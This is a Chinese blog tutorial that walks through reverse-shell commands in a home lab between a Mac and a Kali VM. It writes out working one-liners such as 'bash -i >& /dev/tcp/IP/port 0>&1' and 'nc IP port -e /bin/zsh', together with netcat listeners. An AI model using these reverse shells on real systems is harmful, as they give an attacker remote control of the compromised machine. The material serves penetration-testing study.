Loading [MathJax]/jax/output/CommonHTML/config.js
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1

【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1

作者头像
wjl110
发布于 2022-04-10 04:45:08
发布于 2022-04-10 04:45:08
2.2K03
代码可运行
举报
运行总次数:3
代码可运行

前言

为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯)

作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1


更容易阅读的版本在这里,点击传送


常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1

何为shell

Shell 脚本(shell script),是一种为 shell 编写的脚本程序。

如何执行

有一个能编写代码的文本编辑器和一个能解释执行的脚本解释器就可以执行

shell种类

linux

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Bourne Shell(/usr/bin/sh或/bin/sh)
Bourne Again Shell(/bin/bash)
C Shell(/usr/bin/csh)
K Shell(/usr/bin/ksh)
Shell for Root(/sbin/sh)..

Mac

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
bash
zsh
..

Windows

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
PowerShell
Cmd
..

bash与sh

bash对sh兼容,是各种Linux发行版标准配置的Shell

何为反弹shell:

:::tip

  • 让靶机主动执行连接我们本地机器的命令
  • 优点:
  • 靶机更换ip后依然不会丢失权限
  • 连接方便、操作简单
  • 相较于传统后门不易被清理等优势; :::

正向shell

可以理解为q1给q2打电话,q2接电话,完成信息接通

反弹shell

可以理解为q1给q2打电话,q2把q1的电话号码保存下来,然后重新呼叫了q1

linux反弹shell

nc(NetCat)

可实现任意TCP/UDP端口的侦听

安装nc(发行版linux默认已安装)

命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
yum install nc -y

使用方法

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nc -lvp 4444 
# -lvp (l监听v输出p端口)

实战

靶机执行:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
bash -i >& /dev/tcp/192.168.0.10/4444 0>&1
# bash -i  启动交互式命令bash 
# -i       将输出重定向到文件
# /dev/tcp 靶机为Linux的设备/dev/tcp连接程序启动socket(Linux系统:所有程序都是目录文件)
# 192.168.0.10/4444 连接的ip和端口(即本地计算机)
# 0>&1     远程的输入和输出(消息呈现方式为远程)

命令

解释

bash -i

启动交互式命令bash

-i

将输出重定向到文件

/dev/tcp

靶机为Linux的设备/dev/tcp连接程序启动socket(Linux系统:所有程序都是目录文件)

192.168.0.10/4444

连接的ip和端口(即本地计算机)

0>&1

远程的输入和输出(消息呈现方式为远程)

实战时注意

:::warning Mac监听端没有nc -lvp port此命令 只有nc -lv port :::

实战中,我拿Mac和kali-linux进行测试

查看Mac和Linux的ip命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
sudo su
ifconfig

kali的ip:10.211.55.4

Mac的ip:10.37.129.2

正向连接- Mac连接kali

1.kali启动监听:(先启动监听,否则拒绝连接)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
sudo su
nc -lv 7777

Mac执行:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
sudo su
zsh -i > /dev/tcp/mac监听ip/mac监听端口
(ls,pwd,whoami,cd /tmp,)

此时Mac终端执行者已经变为kali的root用户

尝试发送信息(Mac->kali)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
whoami

kali机:监听端口并且实时回显信息

尝试在kali上执行命令

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
pwd

可以看到Mac上并无信息

因为此时为单方通信,即Mac的信息呈现在kali

反弹shell

shell:Mac->(攻击)kali

Mac开启监听

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nc -lv 7777

kali开启shell

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nc 10.211.55.2(Mac:ip) 7777 -e /bin/zsh(zsh或者bash) 

ps:模拟渗透测试时通过某个途径将shell命令发送到了kali机器并成功执行

此时在Mac(攻击机)上执行命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
whoami

可以看到Mac机成功执行命令,并且反弹回相关信息

再看看kali机

并无任何显示

反弹shell:linux——>(攻击)kali kali开启监听

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nc -lvnp 7777

Mac被攻击,执行了shell命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
bash -i >& /dev/tcp/10.211.55.4(kali)/7777 0>&1

此时kali已经有回显信息了,并且连接成功为bash

在kali上执行命令,成功回显

Mac不能执行主动终结命令,权限属于kali机

以上就是我对反弹shell的理解和感受,欢迎留言 写作耗时约2h@(。・o・)@

  1. https://blog.csdn.net/qq_37092496/article/details/122931617 ↩︎
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022/03/15 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
反弹shell命令学习笔记(命令在Mac里执行,反弹到kali机)sudo su 后连接必反弹
反弹shell命令(命令在Mac里执行,反弹到kali机)sudo su 后连接必反弹 Mac端监听命令没有nc -lvp port 只有 nc -lv (或-lvv) port Mac➡️kali : sudo su zsh -i > /dev/tcp/监听ip/监听端口 (ls,pwd,whoami,cd /tmp,) kali机:监听端口并且实时回显信息 nc -lvnp 监听端口 单方通信nc Mac: nc -lv 7777 kali: nc -v 10.211.55.2(Mac:ip) 7777
wjl110
2022/03/14
1.1K0
Linux下几种反弹Shell方法的总结与理解
之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。
用户6543014
2019/10/25
2K0
Linux下几种反弹Shell方法的总结与理解
如何反弹shell
netcat也就是平时用的nc,是一种功能丰富的网络调试和调查工具,它可以产生用户可能需要的几乎任何类型的连接,可以连接到远程主机nc -nvv Targert_IP Targert_Port,监听本地主机nc -l -p Local_Port,端口扫描nc -v target_IP target_Port、端口监听nc -l -p local_Port、远程文件传输nc Targert_IP Targert_Port < Targert_File、正向shell、反向shell等等。
ek1ng
2022/08/10
9990
如何反弹shell
Linux下反弹Shell方法
kali Linux (内外:192.168.5.139) Centos8 (腾讯云:123.6.44.67)
逍遥子大表哥
2022/04/17
2.5K0
Linux下反弹Shell方法
shell反弹原理
原理非常简单,当在以上两种场景时,无法直接连接到webshell时,可以换一种策略。让webshell主动连接自己,而不是自己连接webshell。此时,又会产生两个问题。 一webshell如何自动自我唤醒自动发送连接; 二如何监听webshell发送的连接;
cultureSun
2023/05/18
5820
Linux环境反弹shell原理与姿势
我们日常渗透测试过程中的最终目的是获取到目标系统的权限,常见的有通过文件上传、命令执行、反序列化等方式,其中在执行命令执行的时候由于目标系统大多数情况下处于防火墙之后、命令执行的权限不够、端口被占用等情况,那么在这种情况下我们就需要考虑——反弹shell,即攻击者在攻击主机上开启端口监听,随后让目标主机反向连接攻击者的服务器,从而规避防火墙、端口、权限等问题,本篇文章我们主要介绍Linux环境中如何通过命令执行来反弹shell
Al1ex
2025/01/12
1.4K0
Linux环境反弹shell原理与姿势
使用nc及bash进行反弹shell的简单实践
反弹shell(reverse shell),就是控制端监听在某TCP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。
yuanfan2012
2021/04/22
9K0
使用nc及bash进行反弹shell的简单实践
Linux命令――bash
bash是一个命令解释语言,能够执行读取标准输入或文件的命令,可以执行命令以及结合nc进行反弹shell
随心助手
2022/11/30
3.3K0
从一道题目中学习反弹shell
最近在帮一位大师傅测试招新赛的时候,发现自己对反弹shell是不太了解的,因此在用反弹shell解题过后,来对反弹shell进行相关学习,希望对各位师傅有所帮助。
用户9691112
2023/05/18
7100
从一道题目中学习反弹shell
干货 | Linux之渗透测试常用反弹shell方法总结
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
网络安全自修室
2024/03/18
1.3K0
干货 | Linux之渗透测试常用反弹shell方法总结
内网隧道搭建总结(一)
该操作在vm虚拟机中完成,提前安装了Windows7、kali linux、Windows server2008。
乌鸦安全
2021/10/26
2.2K0
内网隧道搭建总结(一)
WEB安全基础 - - -Linux反弹shell
      Shell是系统的用户界面,提供了用户与内核进行交互操作的一种接口。它接收用户输入的命令并把它送入内核去执行。
干掉芹菜
2022/11/19
1.7K0
WEB安全基础 - - -Linux反弹shell
反弹shell | 反弹shell总结
声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
安全小王子
2022/12/11
3.7K0
反弹shell | 反弹shell总结
攻防|反弹shell方式汇总
注意有些反弹shell的方法或脚本只适用于Linux或者Windows,注意区分相关脚本的编写方式方法。
亿人安全
2024/04/19
1.3K0
攻防|反弹shell方式汇总
Replay_CTF靶机渗透
下载地址:https://www.vulnhub.com/entry/replay-1,278/
Elapse
2020/08/17
6220
Linux反弹shell
上面的是一个典型的反弹shell的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到
vFREE
2021/12/19
11.2K0
Linux反弹shell
【权限提升】Linux系统&辅助项目&脏牛&Dirty&内核漏洞&SUID&GUID
GitHub - liamg/traitor: :arrow_up: :fire: Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins, pwnkit, dirty pipe, +w docker.sock
没事就要多学习
2024/07/18
2280
【权限提升】Linux系统&辅助项目&脏牛&Dirty&内核漏洞&SUID&GUID
不一样的 "反弹Shell" 系统剖析
前两篇文章讲解了cmd和powershell混淆的各种姿势,原理和防御方式,希望能对大家有启发。
七夜安全博客
2020/06/16
3.4K0
不一样的 "反弹Shell" 系统剖析
Linux下终端实现文件上传与反弹
注意:本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。
全栈工程师修炼指南
2020/10/23
3.7K0
Linux下终端实现文件上传与反弹
内网渗透 | 全网最实用的反弹shell总结
声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
安全小王子
2022/12/11
1.9K0
相关推荐
反弹shell命令学习笔记(命令在Mac里执行,反弹到kali机)sudo su 后连接必反弹
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验